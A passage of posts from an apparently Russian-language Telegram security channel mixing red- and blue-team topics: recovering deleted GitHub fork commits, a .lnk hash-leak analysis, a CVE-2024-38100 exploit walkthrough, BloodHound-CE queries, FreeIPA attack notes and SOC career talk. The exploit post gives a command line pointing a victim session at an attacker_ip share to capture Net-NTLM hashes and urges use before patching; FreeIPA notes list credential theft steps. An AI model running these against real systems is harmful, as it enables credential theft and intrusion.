Привет, друзья! 👋
А вы знали, что любой может получить доступ к удаленным или приватным репозиториям на GitHub?😲 Правда в случае с приватными репозиториями, должен быть публичный форк проекта. И что самое интересное - это не баг, а вполне себе легитимный и даже задокументированный функционал 😻 . Ссылочка на документацию Git
Чтобы убедиться, что после удаления проекта коммиты все еще существуют, можете выполнить следующее:
1️⃣ Создаете форк любого публичного проекта.
2️⃣ Вносите изменения в новый форк, запоминаете хеш коммита и удаляете проект.
3️⃣ Вставляете хеш коммита с изменениями вашего удаленного форка в основной проект и радуетесь, что коммит никуда не исчез.
Если всё сделали верно, то при переходе по ссылке увидите надпись:
🔍 И если у проекта есть приватный форк, который используется для хранения каких-то фич, которые не должны быть в паблике, то это тоже можно прочитать.
Однако, как вы могли заметить, для обоих случаев нам необходимо знать хеш коммита. А где его взять? Например, перебрать. Серьезно!? 40 символов!? Спросите вы. И да, скажу я вам, можно попробовать перебрать. И не 40 символов, а 4. В GitHub есть система коротких ссылок. Таким образом, хеш вида:
превращается в
Что значительно упрощает задачу.
А пока мы пошли проверять подобный функционал на других площадках. 🚀 Можете ознакомиться со статьей команды TruffleSecurity. Ребята разобрали различные векторы использования данного функционала и рассказали, чем это может быть черевато.
🔗 Ссылочка на статью: https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github
#redteam
А вы знали, что любой может получить доступ к удаленным или приватным репозиториям на GitHub?
Чтобы убедиться, что после удаления проекта коммиты все еще существуют, можете выполнить следующее:
1️⃣ Создаете форк любого публичного проекта.
2️⃣ Вносите изменения в новый форк, запоминаете хеш коммита и удаляете проект.
3️⃣ Вставляете хеш коммита с изменениями вашего удаленного форка в основной проект и радуетесь, что коммит никуда не исчез.
Если всё сделали верно, то при переходе по ссылке увидите надпись:
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Однако, как вы могли заметить, для обоих случаев нам необходимо знать хеш коммита. А где его взять? Например, перебрать. Серьезно!? 40 символов!? Спросите вы. И да, скажу я вам, можно попробовать перебрать. И не 40 символов, а 4. В GitHub есть система коротких ссылок. Таким образом, хеш вида:
a7630fd249a81add7f252cb53173be04f61ce634
превращается в
a763
Что значительно упрощает задачу.
А пока мы пошли проверять подобный функционал на других площадках. 🚀 Можете ознакомиться со статьей команды TruffleSecurity. Ребята разобрали различные векторы использования данного функционала и рассказали, чем это может быть черевато.
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub Docs
What happens to forks when a repository is deleted or changes visibility? - GitHub Docs
Deleting your repository or changing its visibility affects that repository's forks.
🔥10✍1🎃1
Не так давно был пост про подделку ярлыка для бокового перемещения. Теперь предлагаю рассмотреть, как это выглядит со стороны синей команды🛡.
Мы обнаружили подозрительные события перехода по SMB на неизвестный никому адрес. Определив источник событий находим неприметный .lnk файл. По событиям 4663 или 5145 журнала Security можем определить, когда именно и кем данный файл был помещен в систему.
Анализировать ВПО на рабочем\личном устройстве очень плохая идея, так что нам нужна своя лаборатория для анализа. Существует отличный проект с открытым исходным кодом - Flare VM, инструкция по установке есть в файле README и неплохая пошаговая инструкция на youtube
Анализ файлов состоит из двух частей: статический и динамический
1. Статический анализ🔬.
Подразумевает сбор информации о файле без его запуска:
- Метаданные (имя, размер, дата создания, дата изменения, дата доступа, информация о создателе)
- Хэш-суммы
- Структура файла (например, PE для исполняемых файлов Windows, ELF для Linux, PDF, DOCX и др.)
- Содержимое и код (дисассемблированный код для анализа логики работы приложения)
Для начала этого достаточно.
Для некоторых типов файлов есть уже готовые утилиты для анализа.
Вот какую информацию позволяет получить LECmd:
В поле Icon Location располагается ссылка на потенциально вредоносный ресурс, к которому идут обращения всех пользователей, которые переходят в папку с файлом используя проводник.
Сам ярлык ведет к браузеру Microsoft Edge🌍.
Так же получаем информацию об имени устройства и MAC Address, на котором данный файл был создан (полезно, если устройство в домене):
Все необходимые данные мы получили, приступаем к следующему этапу анализа
2. Динамический анализ🧑💻.
В рамках динамического анализа производится запуск файла для выявления следующих ключевых аспектов:
- Поведение программы
- Сетевое поведение
- Изменения в файловой системе
- Изменения в реестре
- Используемые системные ресурсы
- Процессное дерево
- Статистика и логирование
- Взаимодействие с другими программами и системами
Учитывая специфику нашего файла интереснее всего взглянуть на сетевой трафик при помощи Wireshark
Находим пакет Session Setup Request, NTLMSSP_AUTH, User: .\tim и видим в нем следующую информацию:
В запросах видим событие передачи данных об имени хоста, с которого было осуществлено подключение, имя пользователя и NTLM хэш.
На этом можно было бы и закончить, но важно понимать, что злоумышленники могут предпринять, имея на руках NetNTLM хэш и принять соответствующие меры, а именно:
- Сбросить пароли для учетных записей пользователей, хэши чьих паролей были переданы
- Заблокировать УЗ пользователя создавшего .lnk файл
- Изолировать от сети хост (если это возможно), на котором .lnk файл был модифицирован
#blueteam
Мы обнаружили подозрительные события перехода по SMB на неизвестный никому адрес. Определив источник событий находим неприметный .lnk файл. По событиям 4663 или 5145 журнала Security можем определить, когда именно и кем данный файл был помещен в систему.
Анализировать ВПО на рабочем\личном устройстве очень плохая идея, так что нам нужна своя лаборатория для анализа. Существует отличный проект с открытым исходным кодом - Flare VM, инструкция по установке есть в файле README и неплохая пошаговая инструкция на youtube
Анализ файлов состоит из двух частей: статический и динамический
1. Статический анализ🔬.
Подразумевает сбор информации о файле без его запуска:
- Метаданные (имя, размер, дата создания, дата изменения, дата доступа, информация о создателе)
- Хэш-суммы
- Структура файла (например, PE для исполняемых файлов Windows, ELF для Linux, PDF, DOCX и др.)
- Содержимое и код (дисассемблированный код для анализа логики работы приложения)
Для начала этого достаточно.
Для некоторых типов файлов есть уже готовые утилиты для анализа.
Вот какую информацию позволяет получить LECmd:
Name: Просмотр веб-страниц
Relative Path: ..\..\..\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Working Directory: C:\Program Files (x86)\Microsoft\Edge\Application
Icon Location: \\1.45.136[.]217\share
В поле Icon Location располагается ссылка на потенциально вредоносный ресурс, к которому идут обращения всех пользователей, которые переходят в папку с файлом используя проводник.
Сам ярлык ведет к браузеру Microsoft Edge🌍.
Так же получаем информацию об имени устройства и MAC Address, на котором данный файл был создан (полезно, если устройство в домене):
Tracker database block
Machine ID: hostname
MAC Address: c4:03:a8:ce:c0:00
MAC Vendor: (Unknown vendor)
Creation: 2023-09-20 16:15:08
Все необходимые данные мы получили, приступаем к следующему этапу анализа
2. Динамический анализ🧑💻.
В рамках динамического анализа производится запуск файла для выявления следующих ключевых аспектов:
- Поведение программы
- Сетевое поведение
- Изменения в файловой системе
- Изменения в реестре
- Используемые системные ресурсы
- Процессное дерево
- Статистика и логирование
- Взаимодействие с другими программами и системами
Учитывая специфику нашего файла интереснее всего взглянуть на сетевой трафик при помощи Wireshark
Находим пакет Session Setup Request, NTLMSSP_AUTH, User: .\tim и видим в нем следующую информацию:
Domain name: DESKTOP-2Q3SAD1
User name: tim
Host name: DESKTOP-2Q3SAD1
NTLMv2 Response: 561393d6c45c520cf59b0f2164a44b53:010100000000000080cc3abb5aeada011c521ff2286be6fe000000000100100052006a00620052006a006900760051000300100052006a00620052006a006900760051000200100041005a0076005100490074006d006d000400100041005a0076005100490074006d006d000700080080cc3abb5aeada0106000400020000000800300030000000000000000100000000200000ec56f98273b68c776c7aa89b1329e54f290cd1254c2586ac939288f6bd63d2370a001000000000000000000000000000000000000900260063006900660073002f003100340037002e00340035002e003100330036002e003200310037000000000000000000
В запросах видим событие передачи данных об имени хоста, с которого было осуществлено подключение, имя пользователя и NTLM хэш.
На этом можно было бы и закончить, но важно понимать, что злоумышленники могут предпринять, имея на руках NetNTLM хэш и принять соответствующие меры, а именно:
- Сбросить пароли для учетных записей пользователей, хэши чьих паролей были переданы
- Заблокировать УЗ пользователя создавшего .lnk файл
- Изолировать от сети хост (если это возможно), на котором .lnk файл был модифицирован
#blueteam
🔥5👍3
💥 Привет, друзья!
Пока ещё не закончился сезон отпусков, хочу сделать небольшой обзор видеоигр про программирование и хакерство. 👾
1️⃣ Начну с одной из самых популярных игр из жанра хакерства — Hacknet. Это отличный симулятор хакера, как в фильмах, со скоростным набором текста, музыкой в стиле Hotline Miami и отдельной псевдооперационной unix-like системой. Почувствуем себя Мистером Роботом 😈
2️⃣ Uplink — наверное самая старая из этого жанра (2006 год). Это тоже симулятор злоумышленника, но с уклоном в "реалистичность" и экономику типа выполняй квесты и покупай апгрейды. Но атмосфера и обстановка не менее затягивающая, как и в Hacknet.
С хакерскими всё, теперь про программирование.
3️⃣ Screeps — MMO Realtime стратегия, где каждого юнита нужно буквально программировать. Единственная проблема — официальный их язык только один - JavaScript. Есть библиотеки и на питоне, но они не официальные и давно не обновлялись. В остальном всё круто.
4️⃣ Human Resource Machine и её сиквел Seven Billion Humans. Ну тут вообще что-то невероятное. Разработчики умудрились использовать ассемблер как основной инструмент головоломки и сделать его понимание настолько простым, что проще только Scratch. В целом все игры от Tomorrow Corporation отличные.
5️⃣ Завершает список Prime Mover - в ней нужно собирать схемы из выданных логических элементов. То-есть по уровню абстракции это самая близкая к железу из перечисленного. Жаль, что она не стала так популярна, как остальные
Вот такой получился хаотичный список, на экстренный случай прокрастинации😁
#NotRedteam
Пока ещё не закончился сезон отпусков, хочу сделать небольшой обзор видеоигр про программирование и хакерство. 👾
С хакерскими всё, теперь про программирование.
Вот такой получился хаотичный список, на экстренный случай прокрастинации😁
#NotRedteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍2👌1🤝1
A long time ago... около двух недель назад был опубликован POC для CVE-2024-38100 под названием Leaked Wallpaper. Сегодня посмотрим на него поближе😋
😦 Что за CVE?
CVE-2024-38100 — уязвимость в механизме обработки обоев операционной системы Windows.
😳 Принцип работы эксплоита
😋 По шагам:
1. Билдим наш exe
2. Чекаем сессии через quser
3. Выбираем жертву среди сессий
4. Пускаем на нее наш эксплоит :
5. Вы великолепны, получили Net-NTLMv1 (см. пикчу в посте). В результате можно релеить, брутить или восстановить NTLM-хеш при помощи брута и уязвимостей DES.
😳 Что по детектам?
Ни в статике, ни в динамике антивирь пока не ругается
🙂 Уже пофиксили?
Да, в июне Microsoft выпустили фиксу KB5040434, так что успевайте юзать до ее установки :)
#redteam
CVE-2024-38100 — уязвимость в механизме обработки обоев операционной системы Windows.
Реализован через изменение обоев привилегированного пользователя с использованием специального COM-oбъекта
1. Билдим наш exe
2. Чекаем сессии через quser
3. Выбираем жертву среди сессий
4. Пускаем на нее наш эксплоит :
LeakedWallpaper.exe session_id \\attacker_ip\c$\1.jpg -downgrade
‼️ Стоит обратить внимание на флаг -downgrade (понижение версии NetNTLM), для его использования необходимы права локального администратора, а именно наличие прав на изменение параметров реестра LMCompatibilityLevel, NtlmMinClientSec, RestrictSendingNTLMTraffic.
5. Вы великолепны, получили Net-NTLMv1 (см. пикчу в посте). В результате можно релеить, брутить или восстановить NTLM-хеш при помощи брута и уязвимостей DES.
Ни в статике, ни в динамике антивирь пока не ругается
Да, в июне Microsoft выпустили фиксу KB5040434, так что успевайте юзать до ее установки :)
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍4🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Привет, а мы сегодня на Offzone.
Доклады неплохие, и конкурсы интересные. Не хватает только бесплатной еды (бесплатная вода есть)
Доклады неплохие, и конкурсы интересные. Не хватает только бесплатной еды (бесплатная вода есть)
🔥11😁3
Так уж получилось, что мы попали под недавнюю багу в обновлении windows. Мы, настроенные порешать таски на второй день, решили взять ноут, но вот обновлять винду было ошибкой. Grub перестал загружаться, и выяснялось это как раз в тот момент, когда сели решать таски. 😥
Ну а в общем по офзону всё как всегда - куча активностей, докладов и мерча. И не менее важная фишка - постоянные очереди на стендах. Но проводить время всё равно приятно и интересно.
Ну а в общем по офзону всё как всегда - куча активностей, докладов и мерча. И не менее важная фишка - постоянные очереди на стендах. Но проводить время всё равно приятно и интересно.
😱4❤2😭2🌚1
Привет, друзья! 👋
Хочу поделиться интересной статьей от коллег из Kaspersky о самых популярных эксплойтах и уязвимостях за второй квартал 2024 года.
За первый квартал этого года наиболее популярными уязвимостями были различные инъекции:
1️⃣ SQL Injection
2️⃣ Command Injection
Во втором квартале лидеры изменились:
1️⃣ Unrestricted Upload of File with Dangerous Type
2️⃣ SQL Injection
3️⃣ Path Traversal
Из наиболее часто эксплуатируемых CVE для Windows:
1️⃣ RCE:
CVE-2018-0802, CVE-2017-11882 - уязвимости в редакторе формул ms office
CVE-2021-40444 - уязвимость в MSHTML
2️⃣ LPE: CVE-2017-0199 - уязвимость в MS office и WordPad
Для Linux:
1️⃣ LPE:
CVE-2022-0847, CVE-2023-2640 — уязвимости в ядре Linux
CVE-2021-4034 — уязвимость в утилите pkexec
😏 Подробнее можно прочитать здесь: vulnerability-exploit-report-q2-2024
Главное, друзья, без паники😊 ! Грамотный мониторинг сети, своевременный патч-менеджмент и комплексный подход к защите, включая обучение сотрудников основам ИБ, помогут вам сохранить спокойствие и безопасность.
Всем хорошей рабочей недели и будьте в безопасности!🛡
#blueteam
Хочу поделиться интересной статьей от коллег из Kaspersky о самых популярных эксплойтах и уязвимостях за второй квартал 2024 года.
За первый квартал этого года наиболее популярными уязвимостями были различные инъекции:
Во втором квартале лидеры изменились:
Из наиболее часто эксплуатируемых CVE для Windows:
CVE-2018-0802, CVE-2017-11882 - уязвимости в редакторе формул ms office
CVE-2021-40444 - уязвимость в MSHTML
Для Linux:
CVE-2022-0847, CVE-2023-2640 — уязвимости в ядре Linux
CVE-2021-4034 — уязвимость в утилите pkexec
Главное, друзья, без паники
Всем хорошей рабочей недели и будьте в безопасности!
#blueteam
Please open Telegram to view this post
VIEW IN TELEGRAM
securelist.ru
Анализ ландшафта уязвимостей во втором квартале 2024 года
Отчет содержит статистику по уязвимостям и эксплойтам, а также разбор интересных уязвимостей, обнаруженных во втором квартале 2024 года.
🔥12👍2
💥 Привет. Решил я значит перейти с bloodhound на bloodhound-ce, так как первый перестал поддерживаться. Делюсь опытом:
*️⃣ Ставится одной командой запуска контейнеров. Хоть и предыдущий бладхаунд тоже был прост в развертывании, там не было единого docker-compose файла из коробки
*️⃣ Клиентский интерфейс переехал в веб, что является как плюсом (можно развернуть прям на сервере), так и минусом (спад в производительности)
*️⃣ Нет темной темы, значит интерфейс уже устарел
*️⃣ Нету дебаг-режима для запросов к Neo4j. Да, есть отдельное поле, в которое можно писать, но отображает оно не всё
Но самое главное, это пляски с пометкой цели как Owned и High Value. В прошлом бладхаунде это было просто:
Но я удивился, когда обнаружил, что в новой версии свойства owned и highvalue отсутствуют. Ко всему прочему, в дефолтные запросы не завезли манипуляции с этими свойствами. Что делать?
Оказывается, теперь это переехало в свойство system_tags
Да, разрабы зачем-то решили хранить элементы в строке, разделенной пробелами.
Вопрос: вот мы каким-то образом скомпрометировали пачку пользаков, допустим 50 штук. Как их пометить, как “Owned” и не получить нервный тик. Я придумал вот такое кривое:
Как посмотреть помеченных
Но при этом немного ломается gui-интерфейс - пропадает кнопка “Add To Owned/Remove From Owned”, и вот тут я уже хз.
Это конечно, крайне неудобно, при том, что этот функционал довольно важный при просмотре мисконфигов. И в интернетах информации крайне мало. Надеюсь, у разрабов были причины менять логику работы
Но самое главное, это пляски с пометкой цели как Owned и High Value. В прошлом бладхаунде это было просто:
MATCH (u: User) WHERE u.owned = True RETURN u
Но я удивился, когда обнаружил, что в новой версии свойства owned и highvalue отсутствуют. Ко всему прочему, в дефолтные запросы не завезли манипуляции с этими свойствами. Что делать?
Оказывается, теперь это переехало в свойство system_tags
MATCH (u: User) WHERE u.system_tags is not null RETURN u.name, u.system_tags LIMIT 2000
╒═════════════════════╤════════════════════╕
│u.name │u.system_tags │
╞═════════════════════╪════════════════════╡
│"user1@DOMAIN1.CORP" │"owned" │
├─────────────────────┼────────────────────┤
│"user2@DOMAIN2.CORP" │"admin_tier_0 owned"│
└─────────────────────┴────────────────────┘
Да, разрабы зачем-то решили хранить элементы в строке, разделенной пробелами.
Вопрос: вот мы каким-то образом скомпрометировали пачку пользаков, допустим 50 штук. Как их пометить, как “Owned” и не получить нервный тик. Я придумал вот такое кривое:
WITH ['user1@domain.corp', 'user2@domain.corp', 'user3@domain.corp'] AS userList
MATCH (u:User)
WHERE toLower(u.name) IN userList AND (u.system_tags IS NULL OR u.system_tags = '' OR NOT u.system_tags CONTAINS 'owned')
SET u.system_tags = CASE
WHEN u.system_tags IS NULL OR u.system_tags = '' THEN 'owned'
ELSE u.system_tags + ' owned'
END
RETURN u.name, u.system_tags
Как посмотреть помеченных
MATCH (n)
WHERE n.system_tags CONTAINS 'owned'
RETURN n
Но при этом немного ломается gui-интерфейс - пропадает кнопка “Add To Owned/Remove From Owned”, и вот тут я уже хз.
Это конечно, крайне неудобно, при том, что этот функционал довольно важный при просмотре мисконфигов. И в интернетах информации крайне мало. Надеюсь, у разрабов были причины менять логику работы
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍2❤1👨💻1👀1
FreeIPA, would you?😉
И нет, речь не о бесплатной ипе в банке с последней конфы😋
Собственно, не так давно отгремел OFFZONE 2024, где одной из тем докладов стала FreeIPA.
Этот пост будет беглым ознакомлением о том, с чем кушац эту вашу FreeIPA.
😳 Так о чем речь?
Коротко:
То есть этакий аналог с открытым исходным кодом всем уже давно знакомой Active Directory, но для линухов.
😦 Немножко больше инфы для общего понимания
База с freeipa.org
Ее возможности:
➡️ Управлять пользователями и группами: создавать, редактировать, удалять учетные записи пользователей и групп.
➡️ Управлять доступом: назначать права доступа к файлам, каталогам, системам и приложениям.
➡️ Автоматизировать задачи: использовать автоматизацию для рутинных задач управления доступом.
➡️ Обеспечивать безопасность: использовать аутентификацию Kerberos, SSO и другие функции для повышения безопасности.
🥰 Ha-hack FreeIPA
Сразу хочется отметить одну из интересных особенностей это отсутствие NTLM-аутентификации.
Также в FreeIPA используется полностью своя LDAP структура, но можно юзать старый добрый ldapsearch.
Что по Kerberos:
▪️ User enum (kerbrute)
▪️ Password spraying (kerbrute)
▪️ Дамп тикетов (tickey)
▪️ Получение ключа хоста (/etc/krb5.keytab)
Ну и естественно можно найти всякие интересные CVE.
😳 Итог:
Мало доков, нет готовых автоматизированных решений для поиска уязвимостей, но зато открытый исходый код для тех, кто хочет узнать, что там под капотом.
👍 Тот самый доклад с OFFZONE для ознакомления:
Pentest FreeIPA, или Углубляемся в зоопарк
#redteam
И нет, речь не о бесплатной ипе в банке с последней конфы
Собственно, не так давно отгремел OFFZONE 2024, где одной из тем докладов стала FreeIPA.
Этот пост будет беглым ознакомлением о том, с чем кушац эту вашу FreeIPA.
Коротко:
FreeIPA:централизованное управление идентификацией и доступом
То есть этакий аналог с открытым исходным кодом всем уже давно знакомой Active Directory, но для линухов.
Ее возможности:
Сразу хочется отметить одну из интересных особенностей это отсутствие NTLM-аутентификации.
Если не хочешь, чтобы релеили твой NTLM, не юзай NTLM💅
Также в FreeIPA используется полностью своя LDAP структура, но можно юзать старый добрый ldapsearch.
Что по Kerberos:
Ну и естественно можно найти всякие интересные CVE.
Мало доков, нет готовых автоматизированных решений для поиска уязвимостей, но зато открытый исходый код для тех, кто хочет узнать, что там под капотом.
Pentest FreeIPA, или Углубляемся в зоопарк
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍3🫡2🔥1
REDtalk
💥 Привет. Решил я значит перейти с bloodhound на bloodhound-ce, так как первый перестал поддерживаться. Делюсь опытом: *️⃣ Ставится одной командой запуска контейнеров. Хоть и предыдущий бладхаунд тоже был прост в развертывании, там не было единого docker…
💥 Привет, недавно я делал пост про странную логику Bloodhound-CE при работе с Owned и High Value пользователях.
Проблема была в кривом отображении UI и сбросе данных после перезагрузки при ручной пометке через Neo4j.
Я пошел смотреть исходники и обнаружил преинтереснейшую вещь — В отличии от предыдущего бладхаунда, тут, помимо приложухи и Neo4j в стек добавилась Postgres. Если раньше аутентификация проводилось только через bolt в Neo4j, то тут добавляется еще и аутентификация в саму GUI. Вот эта инфа, и другие настройки, типа Custom Queries хранятся в постгресе.
И (уже не первый раз) я удивился, когда увидел, что там в отдельной таблице хранятся данные об Owned и High-Value нодах.
Из запроса можно увидеть 2 таблицы, одна из которых (нижняя) содержит теги и ID этих тегов, вторая (верхняя) совмещает SID объектов AD с этими ID. То-есть у меня в бладхаенде есть 4 пользака, помеченные как Owned.
И после перезагрузки все свойства system-tags, что было отмечено в Neo4J обнуляются и устанавливаются вот эти четыре.
Нет слов, одни эмоции, не знаю, зачем разработчики сделали такую логику. Наверное стоит завести Issue на гитхабе
#redteam
Проблема была в кривом отображении UI и сбросе данных после перезагрузки при ручной пометке через Neo4j.
Я пошел смотреть исходники и обнаружил преинтереснейшую вещь — В отличии от предыдущего бладхаунда, тут, помимо приложухи и Neo4j в стек добавилась Postgres. Если раньше аутентификация проводилось только через bolt в Neo4j, то тут добавляется еще и аутентификация в саму GUI. Вот эта инфа, и другие настройки, типа Custom Queries хранятся в постгресе.
И (уже не первый раз) я удивился, когда увидел, что там в отдельной таблице хранятся данные об Owned и High-Value нодах.
bloodhound=# select * from asset_group_selectors;
---+------------------+------------------+---+----+-------------------------------+------------------------------
1 | S-1-<SNIP>-17251 | S-1-<SNIP>-17251 | f | 1 | 2024-09-02 09:34:55.977957+00 | 2024-09-02 09:34:55.977957+00
1 | S-1-<SNIP>-7261 | S-1-<SNIP>-7261 | f | 3 | 2024-09-02 10:51:05.968531+00 | 2024-09-02 10:51:05.968531+00
1 | S-1-<SNIP>-13965 | S-1-<SNIP>-13965 | f | 4 | 2024-09-02 10:51:10.386376+00 | 2024-09-02 10:51:10.386376+00
1 | S-1-<SNIP>-21856 | S-1-<SNIP>-21856 | f | 5 | 2024-09-02 11:29:49.443476+00 | 2024-09-02 11:29:49.443476+00
(4 rows)
bloodhound=# select * from asset_groups;
name | tag | system_group | id | created_at | updated_at
-----------------+--------------+--------------+----+-------------------------------+-------------------------------
Owned | owned | t | 1 | |
Admin Tier Zero | admin_tier_0 | t | 2 | 2024-08-28 12:34:58.093203+00 | 2024-08-28 12:34:58.093203+00
(2 rows)
Из запроса можно увидеть 2 таблицы, одна из которых (нижняя) содержит теги и ID этих тегов, вторая (верхняя) совмещает SID объектов AD с этими ID. То-есть у меня в бладхаенде есть 4 пользака, помеченные как Owned.
И после перезагрузки все свойства system-tags, что было отмечено в Neo4J обнуляются и устанавливаются вот эти четыре.
Нет слов, одни эмоции, не знаю, зачем разработчики сделали такую логику. Наверное стоит завести Issue на гитхабе
#redteam
👍5🔥4
SOC на аутсорсе 💰 или in-house SOC 🧃
Что бы выбрали вы?
Мы как то рассказывали, что это такое и в чем отличия, поговорим теперь о работе в данных организациях с точки зрения сотрудника, понятно, то что есть в одной компании, будет отсутствовать в другой, но так как я поработал и там и там расскажу о тех моментах, с которыми мне пришлось столкнуться.
Начнем с SOC-а на аутсорсе.
Плюсы➕:
1. Четкое разграничение ответственности
Моя первая работа в качестве SOC аналитика началась именно там, поначалу безумно нравилось тем, что при заключении договора, есть четкая документация, в рамках которой ты работаешь, в целом все понятно и прозрачно, кому что писать, у кого что спрашивать;
2. Работодатель более охотно оплачивает курсы, платные митапы
Компания заинтересована в вашем развитии, т.к. вы тот актив, который приносит деньги, и от качества предоставляемой услуги, зависит удовлетворенность заказчика и следовательно продление\подписание новых контрактов;
3. Большая команда
Как правило именно тут команда SOC будет больше, т.к. такой SOC создается под несколько компаний, а следовательно больше людей - больше компетенций.
Минусы➖:
1. Не вовлеченность заказчика
Как и многие мои коллеги, я столкнулся с проблемой, что услуга SOC приобреталась с целью отчета перед регулятором о том, что инфраструктуру мониторят, а если это так, то у вас целый букет проблем
Запросы о предоставлении дополнительной информации, необходимой для расследования инцидента, могут висеть неделями, рекомендации об устранении инцидента могут игнорироваться, а сбор дополнительных событий будет расцениваться как попытка саботажа и отвергнута по причине излишней нагрузки на сеть;
2. Ощущение работы в пустую
Вытекает из предыдущего минуса, и начинаешь ощущать это тогда, когда хочешь сделать что то хорошо, тратишь на решение какой то проблемы время, но от твоих идей отказываются за ненадобностью;
3. Достаточно высокая нагрузка
Как правило на мониторинге находятся несколько компаний и периодически случается так, что иногда не хватает времени на то, что бы нормально поесть.
Итог:
На мой взгляд, это отличное место для старта карьеры, как правило, в таких SOC-ах, большая часть процессов выстроена и следовательно не нужно изобретать велосипед. Сотрудников больше чем в in-house, следовательно всегда есть человек, который может что-то подсказать. Но я там не смог долго проработать по ряду причин, одна из которых это ощущение работы в пустую.
Был ли у вас опыт работы в SOC-е на аутсорсе, и с какими нюансами работы сталкивались вы?
В следующей статье, расскажу про нюансы работы в in-house SOC-е
#SOC #blueteam #REDtalk
Что бы выбрали вы?
Мы как то рассказывали, что это такое и в чем отличия, поговорим теперь о работе в данных организациях с точки зрения сотрудника, понятно, то что есть в одной компании, будет отсутствовать в другой, но так как я поработал и там и там расскажу о тех моментах, с которыми мне пришлось столкнуться.
Начнем с SOC-а на аутсорсе.
Плюсы➕:
1. Четкое разграничение ответственности
Моя первая работа в качестве SOC аналитика началась именно там, поначалу безумно нравилось тем, что при заключении договора, есть четкая документация, в рамках которой ты работаешь, в целом все понятно и прозрачно, кому что писать, у кого что спрашивать;
2. Работодатель более охотно оплачивает курсы, платные митапы
Компания заинтересована в вашем развитии, т.к. вы тот актив, который приносит деньги, и от качества предоставляемой услуги, зависит удовлетворенность заказчика и следовательно продление\подписание новых контрактов;
3. Большая команда
Как правило именно тут команда SOC будет больше, т.к. такой SOC создается под несколько компаний, а следовательно больше людей - больше компетенций.
Минусы➖:
1. Не вовлеченность заказчика
Как и многие мои коллеги, я столкнулся с проблемой, что услуга SOC приобреталась с целью отчета перед регулятором о том, что инфраструктуру мониторят, а если это так, то у вас целый букет проблем
Запросы о предоставлении дополнительной информации, необходимой для расследования инцидента, могут висеть неделями, рекомендации об устранении инцидента могут игнорироваться, а сбор дополнительных событий будет расцениваться как попытка саботажа и отвергнута по причине излишней нагрузки на сеть;
2. Ощущение работы в пустую
Вытекает из предыдущего минуса, и начинаешь ощущать это тогда, когда хочешь сделать что то хорошо, тратишь на решение какой то проблемы время, но от твоих идей отказываются за ненадобностью;
3. Достаточно высокая нагрузка
Как правило на мониторинге находятся несколько компаний и периодически случается так, что иногда не хватает времени на то, что бы нормально поесть.
Итог:
На мой взгляд, это отличное место для старта карьеры, как правило, в таких SOC-ах, большая часть процессов выстроена и следовательно не нужно изобретать велосипед. Сотрудников больше чем в in-house, следовательно всегда есть человек, который может что-то подсказать. Но я там не смог долго проработать по ряду причин, одна из которых это ощущение работы в пустую.
Был ли у вас опыт работы в SOC-е на аутсорсе, и с какими нюансами работы сталкивались вы?
В следующей статье, расскажу про нюансы работы в in-house SOC-е
#SOC #blueteam #REDtalk
🔥9👍2
Доброго времени суток, друзья!🎉 У нас небольшие изменения на канале! 🛠️ !
Мы рады представить обновленный состав нашей команды авторов🥰 :
@closed_character - red team
@pyfffe - red team
@Huioofy - red team
Мы всегда стремимся улучшить ваш опыт, поэтому решили добавить хештеги для удобной навигации по контенту канала#️⃣ :
#redteam - статьи и посты из мира ИБ со стороны нападения
#blueteam - статьи и посты из мира ИБ со стороны защиты
#REDtalk - новости и анонсы канала
#meme - мемы наше все
#ToolTricks - различные интересные лайфхаки или обзоры инструментов несвязанных с red team или blue team
Мы рады представить обновленный состав нашей команды авторов
@closed_character - red team
@pyfffe - red team
@Huioofy - red team
Мы всегда стремимся улучшить ваш опыт, поэтому решили добавить хештеги для удобной навигации по контенту канала
#redteam - статьи и посты из мира ИБ со стороны нападения
#blueteam - статьи и посты из мира ИБ со стороны защиты
#REDtalk - новости и анонсы канала
#meme - мемы наше все
#ToolTricks - различные интересные лайфхаки или обзоры инструментов несвязанных с red team или blue team
Please open Telegram to view this post
VIEW IN TELEGRAM
Можно ли сделать телеграм-бота без использования специализированных фреймворков и навыков программирования?
Конечно можно.
Тут присутствует задержка между спреями для избежания блокировки, и время сна, на случай, если что-то положится, то хотя бы не ночью. И конечно же подключён бот, буквально двумя строками кода
#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM